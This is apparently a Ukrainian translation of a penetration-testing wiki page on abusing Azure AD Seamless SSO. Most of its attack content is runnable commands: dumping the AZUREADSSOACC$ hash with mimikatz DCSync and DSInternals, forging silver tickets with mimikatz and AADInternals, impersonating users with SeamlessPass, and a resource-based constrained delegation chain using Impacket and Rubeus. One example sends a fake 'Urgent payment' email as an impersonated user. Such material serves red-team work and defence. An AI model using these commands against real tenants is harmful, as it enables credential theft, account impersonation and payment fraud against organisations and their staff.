Az - Seamless SSO

Reading time: 9 minutes

Основна інформація

З документації: Azure Active Directory Seamless Single Sign-On (Azure AD Seamless SSO) автоматично авторизує користувачів, коли вони використовують свої корпоративні пристрої, підключені до вашої корпоративної мережі. Коли ця функція увімкнена, користувачам не потрібно вводити свої паролі для входу в Azure AD, і зазвичай навіть вводити свої імена користувачів. Ця функція забезпечує вашим користувачам легкий доступ до ваших хмарних додатків без необхідності в додаткових компонентів на місці.

В основному Azure AD Seamless SSO авторизує користувачів, коли вони на ПК, приєднаному до локального домену.

Цю функцію підтримують як PHS (Синхронізація хешів паролів), так і PTA (Аутентифікація через проксі).

Desktop SSO використовує Kerberos для аутентифікації. Коли налаштовано, Azure AD Connect створює обліковий запис комп'ютера під назвою AZUREADSSOACC$ в локальному AD. Пароль облікового запису AZUREADSSOACC$ надсилається у відкритому вигляді до Entra ID під час налаштування.

Квитки Kerberos шифруються за допомогою NTHash (MD4) пароля, а Entra ID використовує надісланий пароль для розшифровки квитків.

Entra ID надає кінцеву точку (https://autologon.microsoftazuread-sso.com), яка приймає квитки Kerberos. Браузер комп'ютера, приєднаного до домену, пересилає квитки на цю кінцеву точку для SSO.

Перерахування

# Check if the SSO is enabled in the tenant
Import-Module AADInternals
Invoke-AADIntReconAsOutsider -Domain <domain name> | Format-Table

# Check if the AZUREADSSOACC$ account exists in the domain
Install-WindowsFeature RSAT-AD-PowerShell
Import-Module ActiveDirectory
Get-ADComputer -Filter "SamAccountName -like 'AZUREADSSOACC$'"

# Check it using raw LDAP queries without needing an external module
$searcher = New-Object System.DirectoryServices.DirectorySearcher
$searcher.Filter = "(samAccountName=AZUREADSSOACC`$)"
$searcher.FindOne()

Pivoting: On-prem -> cloud

Щоб отримати цей TGS квиток, атакуючий повинен мати один з наступних елементів:

• TGS скомпрометованого користувача: Якщо ви скомпрометуєте сесію користувача з квитком до HTTP/autologon.microsoftazuread-sso.com в пам'яті, ви можете використовувати його для доступу до хмарних ресурсів.
• TGT скомпрометованого користувача: Навіть якщо у вас його немає, але користувач був скомпрометований, ви можете отримати один, використовуючи трюк з підробкою TGT, реалізований у багатьох інструментах, таких як Kekeo та Rubeus.
• Хеш або пароль скомпрометованого користувача: SeamlessPass зв'яжеться з контролером домену з цією інформацією, щоб згенерувати TGT, а потім TGS.
• Золотий квиток: Якщо у вас є ключ KRBTGT, ви можете створити TGT, який вам потрібен для атакованого користувача.
• Хеш або пароль облікового запису AZUREADSSOACC$: З цією інформацією та Ідентифікатором безпеки (SID) користувача, щоб атакувати, можливо створити сервісний квиток і аутентифікуватися в хмарі (як виконано в попередньому методі).

SeamlessPass

Як пояснено в цьому блозі, наявність будь-якої з попередніх вимог дуже спрощує використання інструменту SeamlessPass для доступу до хмарних ресурсів як скомпрометований користувач або як будь-який користувач, якщо у вас є хеш або пароль облікового запису AZUREADSSOACC$.

Нарешті, з TGT можливо використовувати інструмент SeamlessPass з:

# Using the TGT to access the cloud
seamlesspass -tenant corp.com -domain corp.local -dc dc.corp.local -tgt <base64_encoded_TGT>
# Using the TGS to access the cloud
seamlesspass -tenant corp.com -tgs user_tgs.ccache
# Using the victims account hash or password to access the cloud
seamlesspass -tenant corp.com -domain corp.local -dc dc.corp.local -username user -ntlm DEADBEEFDEADBEEFDEADBEEFDEADBEEF
seamlesspass -tenant corp.com -domain corp.local -dc 10.0.1.2 -username user -password password
# Using the AZUREADSSOACC$ account hash (ntlm or aes) to access the cloud with a specific user SID and domain SID
seamlesspass -tenant corp.com -adssoacc-ntlm DEADBEEFDEADBEEFDEADBEEFDEADBEEF -user-sid S-1-5-21-1234567890-1234567890-1234567890-1234
seamlesspass -tenant corp.com -adssoacc-aes DEADBEEFDEADBEEFDEADBEEFDEADBEEF -domain-sid S-1-5-21-1234567890-1234567890-1234567890 -user-rid 1234
wmic useraccount get name,sid # Get the user SIDs

Додаткова інформація про налаштування Firefox для роботи з seamless SSO може бути знайдена в цьому блозі.

Отримання хешів облікового запису AZUREADSSOACC$

Пароль користувача AZUREADSSOACC$ ніколи не змінюється. Тому адміністратор домену може скомпрометувати хеш цього облікового запису, а потім використовувати його для створення срібних квитків для підключення до Azure з будь-яким синхронізованим локальним користувачем:

# Dump hash using mimikatz
Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\azureadssoacc$ /domain:domain.local /dc:dc.domain.local"'
mimikatz.exe "lsadump::dcsync /user:AZUREADSSOACC$" exit

# Dump hash using https://github.com/MichaelGrafnetter/DSInternals
Get-ADReplAccount -SamAccountName 'AZUREADSSOACC$' -Domain contoso -Server lon-dc1.contoso.local

# Dump using ntdsutil and DSInternals
## Dump NTDS.dit
ntdsutil "ac i ntds" "ifm” "create full C:\temp" q q
## Extract password
Install-Module DSInternals
Import-Module DSInternals
$key = Get-BootKey -SystemHivePath 'C:\temp\registry\SYSTEM'
(Get-ADDBAccount -SamAccountName 'AZUREADSSOACC$' -DBPath 'C:\temp\Active Directory\ntds.dit' -BootKey $key).NTHash | Format-Hexos

Створення срібних квитків

З хешем ви тепер можете генерувати срібні квитки:

# Get users and SIDs
Get-AzureADUser | Select UserPrincipalName,OnPremisesSecurityIdentifier

# Create a silver ticket to connect to Azure with mimikatz
Invoke-Mimikatz -Command '"kerberos::golden /user:onpremadmin /sid:S-1-5-21-123456789-1234567890-123456789 /id:1105 /domain:domain.local /rc4:<azureadssoacc hash> /target:autologon.microsoftazuread-sso.com /service:HTTP /ptt"'
mimikatz.exe "kerberos::golden /user:elrond /sid:S-1-5-21-2121516926-2695913149-3163778339 /id:1234 /domain:contoso.local /rc4:12349e088b2c13d93833d0ce947676dd /target:autologon.microsoftazuread-sso.com /service:HTTP /ptt" exit

# Create silver ticket with AADInternal to access Exchange Online
$kerberos=New-AADIntKerberosTicket -SidString "S-1-5-21-854168551-3279074086-2022502410-1104" -Hash "097AB3CBED7B9DD6FE6C992024BC38F4"
$at=Get-AADIntAccessTokenForEXO -KerberosTicket $kerberos -Domain company.com
## Send email
Send-AADIntOutlookMessage -AccessToken $at -Recipient "someone@company.com" -Subject "Urgent payment" -Message "<h1>Urgent!</h1><br>The following bill should be paid asap."

Використання Silver Tickets з Firefox

Щоб використати silver ticket, слід виконати наступні кроки:

1. Запустіть браузер: Потрібно запустити Mozilla Firefox.
2. Налаштуйте браузер:

• Перейдіть до about:config.
• Встановіть параметр для network.negotiate-auth.trusted-uris на вказане значення:
• https://aadg.windows.net.nsatc.net,https://autologon.microsoftazuread-sso.com
• Перейдіть до Налаштування Firefox > Пошук за Дозволити одноразовий вхід Windows для облікових записів Microsoft, робочих і навчальних та увімкніть його.

3. Доступ до веб-додатку:

• Відвідайте веб-додаток, інтегрований з доменом AAD організації. Загальним прикладом є login.microsoftonline.com.

4. Процес аутентифікації:

• На екрані входу введіть ім'я користувача, залишивши поле пароля порожнім.
• Щоб продовжити, натисніть TAB або ENTER.

On-prem -> Cloud через обмежену делегацію на основі ресурсів

Для виконання атаки потрібно:

• WriteDACL / GenericWrite над AZUREADSSOACC$
• Обліковий запис комп'ютера, яким ви керуєте (хеш і пароль) - ви можете створити один

1. Крок 1 – Додайте свій власний обліковий запис комп'ютера

• Створює ATTACKBOX$ і виводить його SID/NTLM хеш. Будь-який доменний користувач може це зробити, якщо MachineAccountQuota > 0

# Impacket
python3 addcomputer.py CONTOSO/bob:'P@ssw0rd!' -dc-ip 10.0.0.10 \
-computer ATTACKBOX$ -password S3cureP@ss

2. Крок 2 – Надати RBCD на AZUREADSSOACC$ - Записує SID вашої машини в msDS-AllowedToActOnBehalfOfOtherIdentity.

python3 rbcd.py CONTOSO/bob:'P@ssw0rd!'@10.0.0.10 \
ATTACKBOX$ AZUREADSSOACC$

# Or, from Windows:
$SID = (Get-ADComputer ATTACKBOX$).SID
Set-ADComputer AZUREADSSOACC$ `
-PrincipalsAllowedToDelegateToAccount $SID

3. Крок 3 – Підробити TGS для будь-якого користувача (наприклад, alice)

# Using your machine's password or NTLM hash
python3 getST.py -dc-ip 192.168.1.10 \
-spn HTTP/autologon.microsoftazuread-sso.com \
-impersonate alice \
DOMAIN/ATTACKBOX$ -hashes :9b3c0d06d0b9a6ef9ed0e72fb2b64821

# Produces alice.autologon.ccache

#Or, from Windows:
Rubeus s4u /user:ATTACKBOX$ /rc4:9b3c0d06d0b9a6ef9ed0e72fb2b64821 `
/impersonateuser:alice `
/msdsspn:"HTTP/autologon.microsoftazuread-sso.com" /dc:192.168.1.10 /ptt

Ви тепер можете використовувати TGS для доступу до ресурсів Azure як підроблений користувач.

Створення квитків Kerberos для користувачів тільки в хмарі

Якщо адміністратори Active Directory мають доступ до Azure AD Connect, вони можуть встановити SID для будь-якого користувача в хмарі. Таким чином, квитки Kerberos можна створити також для користувачів тільки в хмарі. Єдина вимога полягає в тому, що SID має бути правильним SID.

Посилання

• https://learn.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-sso
• https://www.dsinternals.com/en/impersonating-office-365-users-mimikatz/
• https://aadinternals.com/post/on-prem_admin/
• TR19: Я у вашій хмарі, читаю електронні листи всіх - злом Azure AD через Active Directory